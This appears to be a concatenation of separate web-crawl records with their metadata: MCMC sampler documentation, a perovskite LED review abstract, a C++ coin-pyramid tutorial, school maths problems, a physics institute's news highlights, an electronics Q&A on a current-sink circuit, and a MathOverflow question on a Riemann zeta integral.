distribution will be updated. The variable adaptiveUpdatePeriod must be a positive non-zero integer. The smaller the value of adaptiveUpdatePeriod, the easier it will be for the ParaDRAM kernel to adapt the proposal distribution to the covariance structure of the objective function. However, this will happen at the expense of slower simulation runtime as the adaptation process can become computationally expensive, in particular, for very high dimensional objective functions (ndim >> 1). The larger the value of adaptiveUpdatePeriod, the easier it will be for the ParaDRAM kernel to keep the sampling efficiency close to the requested target acceptance rate range (if specified via the input variable targetAcceptanceRate). However, too large values for adaptiveUpdatePeriod will only delay the adaptation of the proposal distribution to the global structure of the objective function that is being sampled. If adaptiveUpdatePeriod >= chainSize, then no adaptive updates to the proposal distribution will be made. The default value is 4 * ndim, where ndim is the dimension of the domain of the objective function to be sampled. See also the input simulation specification adaptiveUpdateCount, greedyAdaptationCount. ### adaptiveUpdateCount adaptiveUpdateCount represents the total number of adaptive updates that will be made to the parameters of the proposal distribution, to increase the efficiency of the sampler thus increasing the sampling efficiency of ParaDRAM. Every adaptiveUpdatePeriod number of calls to the objective function, the parameters of the proposal distribution will be updated until either the total number of adaptive updates reaches the value of adaptiveUpdateCount. This variable must be a non-negative integer. As a rule of thumb, it may be appropriate to set the input variable chainSize > 2 * adaptiveUpdatePeriod * adaptiveUpdateCount, to ensure ergodicity and stationarity of the MCMC sampler. If adaptiveUpdateCount=0, then the proposal distribution parameters will be fixed to the initial input values throughout the entire MCMC sampling. The default value is 1073741823. See also the input simulation specification adaptiveUpdatePeriod, greedyAdaptationCount. ### greedyAdaptationCount If greedyAdaptationCount is set to a positive integer then the first greedyAdaptationCount number of the adaptive updates of the sampler will be made using only the 'unique' accepted points in the MCMC chain. This is useful, for example, when the function to be sampled by ParaDRAM is high dimensional, in which case, the adaptive updates to ParaDRAM's sampler distribution will less likely lead to numerical instabilities, for example, a singular covariance matrix for the multivariate proposal sampler. The variable greedyAdaptationCount must be a non-negative integer, and not larger than the value of adaptiveUpdateCount. If it is larger, it will be automatically set to adaptiveUpdateCount for the simulation. The default value is 0. See also the input simulation specification adaptiveUpdatePeriod, adaptiveUpdateCount. ### burninAdaptationMeasure burninAdaptationMeasure is a 64-bit real number between 0 and 1, representing the adaptation measure threshold below which the simulated Markov chain will be used to generate the output ParaDRAM sample. In other words, any point in the output Markov Chain that has been sampled during significant adaptation of the proposal distribution (as determined by burninAdaptationMeasure) will not be included in the construction of the final ParaDRAM output sample. This is to ensure that the generation of the output sample will be based on the part of the simulated chain that is practically guaranteed to be Markovian and ergodic. If this variable is set to 0, then the output sample will be generated from the part of the chain where no proposal adaptation has occurred. This non-adaptive or minimally-adaptive part of the chain may not even exist if the total adaptation period of the simulation (as determined by adaptiveUpdateCount and adaptiveUpdatePeriod input variables) is longer than the total length of the output MCMC chain. In such cases, the resulting output sample may have a zero size. In general, when good mixing occurs (e.g., when the input variable chainSize is very large) any specific value of burninAdaptationMeasure becomes practically irrelevant. The default value for burninAdaptationMeasure is 1.00000000000000, implying that the entire chain (with the exclusion of an initial automatically-determined burnin period) will be used to generate the final output sample. ### delayedRejectionCount 0 <= delayedRejectionCount <= 1000 is an integer that represents the total number of stages for which rejections of new proposals will be tolerated by ParaDRAM before going back to the previously accepted point (state). Possible values are: delayedRejectionCount = 0 indicating no deployment of the delayed rejection algorithm. delayedRejectionCount > 0 which implies a maximum delayedRejectionCount number of rejections will be tolerated. For example, delayedRejectionCount = 1, means that at any point during the sampling, if a proposal is rejected, ParaDRAM will not go back to the last sampled state. Instead, it will continue to propose a new state from the last rejected proposal. If the new state is again rejected based on the rules of ParaDRAM, then the algorithm will not tolerate further rejections, because the maximum number of rejections to be tolerated has been set by the user to be delayedRejectionCount = 1. The algorithm then goes back to the original last-accepted state and will begin proposing new states from that location. The default value is delayedRejectionCount = 0. See also the input simulation specification delayedRejectionScaleFactorVec. ### delayedRejectionScaleFactorVec delayedRejectionScaleFactorVec is a real-valued positive vector of length (1:delayedRejectionCount) by which the covariance matrix of the proposal distribution of ParaDRAM sampler is scaled when the Delayed Rejection (DR) scheme is activated (by setting delayedRejectionCount>0). At each ith stage of the DR process, the proposal distribution from the last stage is scaled by the factor delayedRejectionScaleFactorVec(i). Missing elements of the delayedRejectionScaleFactorVec in the input to ParaDRAM will be set to the default value. The default value at all stages is 0.5^(1/ndim) where ndim is the number of dimensions of the domain of the objective function. This default value effectively reduces the volume of the covariance matrix of the proposal distribution by half compared to the last DR stage. See also the input simulation specification delayedRejectionCount. If you have any questions about the topics discussed on this page, feel free to ask in the comment section below, or raise an issue on the GitHub page of the library, or reach out to the ParaMonte library authors.
2021-12-02 10:17:50
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.610778272151947, "perplexity": 2148.1341640777673}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964361253.38/warc/CC-MAIN-20211202084644-20211202114644-00303.warc.gz"}
http://www.whxb.pku.edu.cn/CN/Y2021/V37/I4/2009002
蓝光钙钛矿发光二极管:机遇与挑战 1. 1 华南理工大学材料科学与工程学院,发光材料与器件国家重点实验室,广州 510641 2 华南理工大学环境与能源学院,广州 510006 • 收稿日期:2020-09-01 录用日期:2020-10-04 发布日期:2020-10-22 • 通讯作者: 陈梓铭,叶轩立 E-mail:chenziming@scut.edu.cn;msangusyip@scut.edu.cn • 作者简介:陈梓铭,1991出生,博士导师为华南理工大学的叶轩立教授,现为华南理工大学博士后。主要研究钙钛矿光电器件的研发(包括发光二极管与太阳电池),器件物理与光物理的解析等 叶轩立,1979出生,博士导师为西雅图华盛顿大学的任广禹教授,现为华南理工大学教授。主要研究钙钛矿及有机光电子材料及器件的研发,新应用领域的开拓,以及商业化的转化等 • 基金资助: 国家自然科学基金(21761132001);国家自然科学基金(51573057);国家自然科学基金(91733302);中国博士后科学基金(2019M650197);中国博士后科学基金(2020T130204) Blue Perovskite Light-Emitting Diodes: Opportunities and Challenges Guangruixing Zou1, Ziming Chen1,2,*(), Zhenchao Li1, Hin-Lap Yip1,*() 1. 1 School of Materials Science and Engineering, South China University of Technology, State Key Laboratory of Luminescent Materials and Devices, Guangzhou 510641, China 2 School of Environment and Energy, South China University of Technology, Guangzhou 510006, China • Received:2020-09-01 Accepted:2020-10-04 Published:2020-10-22 • Contact: Ziming Chen,Hin-Lap Yip E-mail:chenziming@scut.edu.cn;msangusyip@scut.edu.cn • About author:Email: msangusyip@scut.edu.cn (H.Y.) Email: chenziming@scut.edu.cn (Z.C.) • Supported by: the National Natural Science Foundation of China(21761132001);the National Natural Science Foundation of China(51573057);the National Natural Science Foundation of China(91733302);the China Postdoctoral Science Foundation(2019M650197);the China Postdoctoral Science Foundation(2020T130204) Abstract: Metal halide perovskites are considered as promising candidates for lighting applications owing to their excellent optoelectronic properties, such as high electron/hole mobility, high photoluminescence quantum yield, high color purity, and facile color tunability. In recent years, perovskite light-emitting diodes (LEDs) have developed rapidly, and their external quantum efficiencies (EQEs) have exceeded 20% for green and red emissions. However, the EQEs and stabilities of blue (particularly deep-blue) perovskite LEDs are still inferior to the green and red counterparts, which severely restricts the application of perovskite LEDs in high-performance and wide color gamut displays as well as white light illumination. Therefore, summarizing the development of blue perovskite LEDs and discussing the opportunities and challenges associated with their future applications will help to guide the further development of the entire perovskite LED field. In this review, according to the emission color, we divide the blue perovskite LEDs into three parts for a better discussion, i.e., the emissions in the sky-blue, pure-blue, and deep-blue regions. We introduce their developed history and discuss the basic strategies to achieve blue emission. There are three typical methods to obtain perovskite emitters with blue emission, i.e., (1) composition engineering, (2) dimensional engineering, and (3) synthesis of perovskite nanocrystals and quantum dots. For composition engineering, changing ions in perovskite ABX3 structure can easily tune the perovskite emission color, particularly while changing the anions in "X" position. Therefore, modulating the ratio between the X-site anions of Br- and Cl- can cause perovskites to emit blue photons ranging from 420 to 490 nm, which almost covers the entire blue spectrum. For dimensional engineering, perovskite materials can form a series of low-dimensional structures (layered structures) with the insertion of organic ligands between the perovskite frameworks. This type of low-dimensional perovskite material typically exhibits better lighting properties than those exhibited by its three-dimensional counterpart owing to its unique charge or energy transfer process of charge carriers. Blue perovskite nanocrystals and quantum dots with high photoluminescence quantum yields are excellent candidates for realizing high-performance pure-blue and deep-blue devices because they can easily incorporate Cl- in their crystals, which is considerably limited in perovskite thin films owing to the poor solubility of inorganic chloride sources in polar solvents. Furthermore, we discuss several challenges associated with blue perovskite LEDs, such as the inferior device performance in the pure-blue and deep-blue regions, difficulty in hole injection, electroluminescence (EL) instability of mixed halide perovskite systems, and lagged operation lifetime, and introduce potential solutions accordingly. Note that the challenges faced by blue perovskite LEDs are also the opportunities for research in this area. Therefore, this review is of a great reference value for the next evolution of blue perovskite LEDs. MSC2000: • O649.4
2021-10-28 21:16:55
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.18390080332756042, "perplexity": 6545.630782655996}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323588526.57/warc/CC-MAIN-20211028193601-20211028223601-00028.warc.gz"}
https://www.tutorialspoint.com/c-cplusplus-program-for-maximum-height-when-coins-are-arranged-in-a-triangle
# C/C++ Program for Maximum height when coins are arranged in a triangle? In this section, we will see one interesting problem. There are N coins. we have to find what is the max height we can make if we arrange the coins as pyramid. In this fashion, the first row will hold 1 coin, second will hold 2 coins and so on. In the given diagram, we can see to make a pyramid of height three we need minimum 6 coins. We cannot make height 4 until we have 10 coins. Now let us see how to check the maximum height. We can get the height by using this formula. ## Example Live Demo #include<iostream> #include<cmath> using namespace std; int getMaxHeight(int n) { int height = (-1 + sqrt(1 + 8 * n)) / 2; return height; } main() { int N; cout << "Enter number of coins: " ; cin >> N; cout << "Height of pyramid: " << getMaxHeight(N); } ## Output Enter number of coins: 13 Height of pyramid: 4 Published on 25-Jul-2019 13:46:50
2019-09-23 13:20:36
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5145106911659241, "perplexity": 1451.6159658415247}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514576965.71/warc/CC-MAIN-20190923125729-20190923151729-00188.warc.gz"}
http://nrich.maths.org/5615/note
### Pythagorean Triples How many right-angled triangles are there with sides that are all integers less than 100 units? ### Tennis A tennis ball is served from directly above the baseline (assume the ball travels in a straight line). What is the minimum height that the ball can be hit at to ensure it lands in the service area? ### Square Pegs Which is a better fit, a square peg in a round hole or a round peg in a square hole? # Where Is the Dot? ##### Stage: 3 Challenge Level: This problem offers students an opportunity to apply Pythagoras' Theorem. It can also be used as a starting point for trigonometry: • what happens to the height of the dot during the first $90^{\circ}$ of turn? • what happens to the height of the dot when it turns beyond $90^{\circ}$? • what can you say about the horizontal displacement of the dot as it turns through a full circle?
2016-07-23 15:10:50
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3770153224468231, "perplexity": 557.0771631043543}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-30/segments/1469257823072.2/warc/CC-MAIN-20160723071023-00206-ip-10-185-27-174.ec2.internal.warc.gz"}
https://www.pks.mpg.de/research/highlights?tx_news_pi1%5B%40widget_0%5D%5BcurrentPage%5D=17&cHash=b00d5d7d9aaa5728510738a21b1a3211
# Highlights Awards and Honors ### Hertha-Sponer-Preis 2011 der DPG Martina Hentschel vom Dresdner Max-Planck-Institut für Physik komplexer Systeme erhält den mit 3.000 Euro dotierten „Hertha-Sponer-Preis“ der Deutschen Physikalischen Gesellschaft. Forschungsschwerpunkt der 39-jährigen Wissenschaftlerin ist die theoretische Beschreibung mesoskopischer elektronischer und optischer Systeme. Ihre Arbeiten sind für die Entwicklung miniaturisierter Laser von praktischer Bedeutung. Publication Highlights ### A Homonuclear Molecule with a Permanent Electric Dipole Moment Permanent electric dipole moments in molecules require a breaking of parity symmetry. Conventionally, this symmetry breaking relies on the presence of heteronuclear constituents. We report the observation of a permanent electric dipole moment in a homonuclear molecule in which the binding is based on asymmetric electronic excitation between the atoms. These exotic molecules consist of a ground-state rubidium (Rb) atom bound inside a second Rb atom electronically excited to a high-lying Rydberg state. Detailed calculations predict appreciable dipole moments on the order of 1 Debye, in excellent agreement with the observations. Weibin Li, Thomas Pohl, Jan-Michael Rost, Seth T. Rittenhouse, Hossein R. Sadeghpour, Johannes Nipper, Bjoern Butscher, Jonathan Balweski, Vera Bendowsky, Robert Löw, Tilman Pfau Science 334, 1110 (2011) Awards and Honors ### Paul Ehrlich- und Ludwig Darmstädter-Nachwuchspreis 2011 der Paul Ehrlich-Stiftung Wie differenzieren sich Zellen in die verschiedenen Zelltypen, die einen lebenden Organismus ausmachen? Neben molekularen Mechanismen spielen dabei mechanische Prozesse eine wesentliche Rolle. Wie diese Parameter miteinander interagieren, steht im Zentrum der Forschungsaktivitäten von Dr. Stephan Grill. Der Biophysiker hat dazu eine Methode entwickelt, mit der die mechanischen Kräfte in lebenden Zellen gemessen werden können. Mit Hilfe eines Lasers kann er bestimmte Zellstrukturen minimal-invasiv zerstören. Deren Fragmente bewegen sich danach voneinander weg, falls die Struktur unter mechanischer Spannung stand. Auf diese Weise erhält der Wissenschaftler einen Überblick darüber, wo in der Zelle mechanische Kräfte walten. Publication Highlights ### Polarization of PAR Proteins by Advective Triggering of a Pattern-Forming System In the Caenorhabditis elegans zygote, a conserved network of partitioning defective 4 (PAR) polarity proteins segregate into an anterior and a posterior domain, facilitated by flows of the cortical actomyosin meshwork. The physical mechanisms by which stable asymmetric PAR distributions arise from transient cortical flows remain unclear. We present evidence that PAR polarity arises from coupling of advective transport by the flowing cell cortex to a multistable PAR reaction-diffusion system. By inducing transient PAR segregation, advection serves as a mechanical trigger for the formation of a PAR pattern within an otherwise stably unpolarized system. We suggest that passive advective transport in an active and flowing material may be a general mechanism for mechanochemical pattern formation in developmental systems. W. Goehring, Philipp Khuc Trong, Justin S. Bois, Debanjan Chowdhury, Ernesto M. Nicola, Anthony A. Hyman, Stephan W. Grill Science 334, 1137 (2011) Awards and Honors ### Marian-Smoluchowski-Emil-Warburg-Preis 2011 der DPG Der Dresdner Physiker Peter Fulde, emeritierte Direktor des Max-Planck-Instituts für Physik komplexer Systeme, erhält den deutsch-polnischen „Marian-Smoluchowski-Emil-Warburg-Preis“, der mit 3.000 Euro dotiert ist. Der 74-Jährige wird für seine Beiträge zur Theorie der Festkörperphysik ausgezeichnet. Peter Fulde hat insbesondere zur Erforschung der Supraleitung, des Magnetismus und zum Verständnis „elektronischer Korrelationen“ maßgeblich beigetragen. Institute's News ### New research group 'Computational Biology and Evolutionary Genomics' The joint junior research group between our institute and the MPI of Molecular Cellbiology and Genetics is headed by Dr. Michael Hiller and uses computational approaches to link phenotypic differences between species to differences in their genomes, which is key to understand how nature’s phenotypic diversity evolved. Institute's News ### New research group 'Collective Dynamics of Cells' The research group headed by Dr. Vasily Zaburdaev develops and applies methods of statistical physics helping to understand complex biological phenomena. Publication Highlights Vulnerabilities related to weak passwords are a pressing global economic and security issue. We report a novel, simple, and effective approach to address the weak password problem. Building upon chaotic dynamics, criticality at phase transitions, CAPTCHA recognition, and computational round-off errors we design an algorithm that strengthens security of passwords. The core idea of our method is to split a long and secure password into two components. The first component is memorized by the user. The second component is transformed into a CAPTCHA image and then protected using evolution of a two-dimensional dynamical system close to a phase transition, in such a way that standard brute-force attacks become ineffective. We expect our approach to have wide applications for authentication and encryption technologies. T.V.Laptyeva, S. Flach, K. Kladko arXiv:1103.6219v1 (2011) ### Emerging local Kondo screening and spatial coherence in the heavy-fermion metal YbRh$_2$Si$_2$ The entanglement of quantum states is both a central concept in fundamental physics and a potential tool for realizing advanced materials and applications. The quantum superpositions underlying entanglement are at the heart of the intricate interplay of localized spin states and itinerant electronic states that gives rise to the Kondo effect in certain dilute magnetic alloys. In systems where the density of localized spin states is sufficiently high, they can no longer be treated as non-interacting; if they form a dense periodic array, a Kondo lattice may be established1. Such a Kondo lattice gives rise to the emergence of charge carriers with enhanced effective masses, but the precise nature of the coherent Kondo state responsible for the generation of these heavy fermions remains highly debated. Here we use atomic-resolution tunnelling spectroscopy to investigate the low-energy excitations of a generic Kondo lattice system, YbRh$_2$Si$_2$. We find that the hybridization of the conduction electrons with the localized 4f electrons results in a decrease in the tunnelling conductance at the Fermi energy. In addition, we observe unambiguously the crystal-field excitations of the Yb$^{3+}$ ions. A strongly temperature-dependent peak in the tunnelling conductance is attributed to the Fano resonance resulting from tunnelling into the coherent heavy-fermion states that emerge at low temperature. Taken together, these features reveal how quantum coherence develops in heavy 4f-electron Kondo lattices. Our results demonstrate the efficiency of real-space electronic structure imaging for the investigation of strong electronic correlations, specifically with respect to coherence phenomena, phase coexistence and quantum criticality. S. Ernst, S. Kirchner, C. Krellner, C. Geibel, G. Zwicknagel, F. Steglich & S. Wirth Nature 474, 362 (2011)
2022-08-17 07:58:12
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4549791216850281, "perplexity": 12512.551094081022}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572870.85/warc/CC-MAIN-20220817062258-20220817092258-00152.warc.gz"}
https://electronics.stackexchange.com/questions/359823/current-sink-for-microcontroller-port-not-constant
# Current sink for microcontroller port not constant I have designed a two-transistor current sink for my application. I need it to keep the current constant which flows through an IR-LED: simulate this circuit – Schematic created using CircuitLab The current should be constant at: I = UBE1 / R1 = ~0.7 V / 120 Ohm = ~5.8 mA Now the problem is that the current will not stay constant as desired when varying the voltage between 2.6 V and 3.3 V. It varies between 1.6 mA and 4 mA. What do I miss here? • Connect R2's one end directly to the +3V supply instead of Q2's collector. – Rohat Kılıç Mar 5 '18 at 10:54 • @RohatKılıç seems to work better now. What's the reason? – arminb Mar 5 '18 at 13:32 • For some excitement, make Q2 a PNP with emitter to the right. This becomes an SCR, and the current will run away. – analogsystemsrf Mar 5 '18 at 13:50 What do I miss here? You forgot to take into account the forward volt drop of the LED. It might be betweeen 0.8 volts and 3 volts depending on technology. Thus, if your supply voltage is 2.6 volts, the "current control circuit" might only receive (maybe) 1.5 volts across it and, given that the two transistors might need at least 1.4 to 1.6 volts across their circuit to begin reasonable conduction, you are on the edge of it just starting to conduct. If your supply voltage did rise higher I'm sure it would begin current limiting around the 5 or 6 mA mark. Here is a slightly improved version of your circuit: - Note that Rb connects directly to the positive rail - it will help but only a little bit because to get conduction from both transistors you still need 1.4 volts to 1.6 volts from Q2's collector to ground (your IO port). Pictures from here. Let me try a slightly more detailed version of Andy aka's answer. Start by assuming the circuit is working properly, and the emitter of Q1 is grounded. Then the base of Q1 will be at about 0.7 volts, and the base of Q2 at about 1.4 volts. It should be apparent that the collector of Q2 MUST be greater than the base, since the voltage across R2 provides the base current to Q2. How much greater? Well, since the collector-emitter voltage is greater than the base-emitter voltage the transistor is operating in linear mode, and let's use a gain of 100 as a starting point. Since the emitter current is 5.8 mA (remember, we've assumed the circuit is working properly), the base current for Q2 is 58 uA. Applying Ohm's Law, we get a resistor voltage of about 2.7 volts, for a collector voltage of (1.4 + 2.7), or 4.1 volts. Add an LED Vf of about 1.2 volts (for an IR LED), and the minimum supply voltage will be about 5.3 volts. So it's no surprise that the circuit isn't doing well at 2.6 to 3.3 volts. • What can I change to keep it well at 2.6 to 3.3 volts? – arminb Mar 6 '18 at 13:34 • @arminb - change your circuit. With your setup, the minimum supply voltage is 1.4 plus the LED voltage, or something like 3 volts (you haven't specified the LED characteristics. You need to look them up, and edit your question to include that information.) I would recommend an op amp which will run at 2.6 volts in a standard current source circuit. – WhatRoughBeast Mar 6 '18 at 22:04 If you want to have active on/off control of the LED and can adjust the sense of your MCU output (in other words, you don't care whether it is active HI or active LO to turn it on), then the following is probably what you want: simulate this circuit – Schematic created using CircuitLab Your original circuit (ignoring the flaws) required your I/O pin to sink ALL of the LED current. That's doable, given the relatively low current. But there's no point designing that level of current into the circuit if it isn't necessary. The above circuit greatly relaxes the load on the I/O pin to perhaps $200\:\mu\text{A}$. I assumed that since your rail voltage was $3\:\text{V}$, that this was also your I/O pin output voltage when HI. So $R_2$ is figured on that basis. In this circuit topology, $Q_2$'s $V_\text{BE}\approx 700\:\text{mV}$ and $Q_1$'s $V_\text{BE}\approx 650\:\text{mV}$. So the base voltage seen by the I/O pin will be about $1.35\:\text{V}$. If the output of the I/O pin is $3\:\text{V}$ at light current load, then $R_2=\frac{3\:\text{V}-1.35\:\text{V}}{200\:\mu\text{A}}\approx 8.2\:\text{k}\Omega$. (That's assuming that $Q_2$ goes into saturation by the time that $\beta_2\approx 30$.) I made $R_2$ to provide even more, closer to $250\:\mu\text{A}$, just to make absolutely sure. Almost any I/O pin can source $250\:\mu\text{A}$ without difficulty. And the load is light enough that the I/O pin will present nearly its $V_\text{CC}$ without much of a drop. Since $Q_2$ starts going into saturation when its collector is at $1.35\:\text{V}$ (which is fine as there is plenty of base current available -- so it can go even lower, if needed), there is $1.65\:\text{V}$ available for the IR LED. Without the datasheet, I can't tell you for sure that this is okay at the current you are using. But probably so given this is an IR LED. Still, the circuit can saturate $Q_2$ and add a few tens of millivolts across the IR LED, just fine. So I think you should be okay. NOTE: A constant current through an untested LED isn't much of a guarantee regarding stable intensity nor equal intensity between two different LEDs. I just want to make sure you understand that using an IR LED as a "standard candle" requires a lot more than just pumping a relatively fixed current through it. (This is an IR LED, so clearly the human logarithmic responses to intensity aren't part of the picture, either.) But since you aren't using any kind of accurate current source anyway, I suppose this isn't an issue for your application.
2019-07-23 00:45:08
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5761503577232361, "perplexity": 1072.0346236214555}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195528635.94/warc/CC-MAIN-20190723002417-20190723024417-00294.warc.gz"}
https://mathoverflow.net/questions/140696/an-integral-representation-of-the-riemann-zeta-function
# An integral representation of the Riemann zeta function I am referring to the equality in equation $3.29$ (page 12) and $4.20$ (page 17) in this paper. I am unable to recognize where this comes from or what is the general expression for values other than $3$. I checked at some online reviews like this - http://www.math.utah.edu/~milicic/zeta.pdf but nothing seems to match. It would be great if someone can help. (Images added by J.O'Rourke) • Where did you come across this? Aug 28, 2013 at 20:51 • Use the integral representations of $\zeta(s)\Gamma(s)$ for $s=3$. Aug 28, 2013 at 21:28 • The equation is incorrect as stated; you want $\zeta$, not $\xi$. But be that as it may, asking us where it comes from without telling us what you already know is a really good way to get your question closed. Aug 28, 2013 at 21:38 • "I came across" is a poor introduction. Where did you see this? Context? Of course some (possibly corrected) version can be adduced from known things, etc., but ... Aug 28, 2013 at 23:27 • Why not actually put the equation here in the post? Asking people to go dig through a linked PDF is perhaps asking too much. Sep 3, 2013 at 0:32 you ask for the "general expression" for values other than $q=3$: $$\int_{0}^{\infty}d\lambda\frac{\lambda^{q/2-1}}{1+e^{2 \pi \sqrt{\lambda}}}=2^{1-2q}(2^q-2)\pi^{-q}\Gamma(q) \zeta(q),\text{ for Re }q>0$$ $$\int_{0}^{\infty}d\lambda\frac{\lambda^{q-1}{\rm coth}(\pi\lambda)}{1+e^{2 \pi \lambda}}=(2\pi)^{-q}\Gamma(q) \zeta(q),\text{ for Re }q>1$$
2022-09-25 12:19:32
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.737119197845459, "perplexity": 509.7555963985714}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00078.warc.gz"}
http://www.sciencemadness.org/talk/viewthread.php?tid=4831&page=2
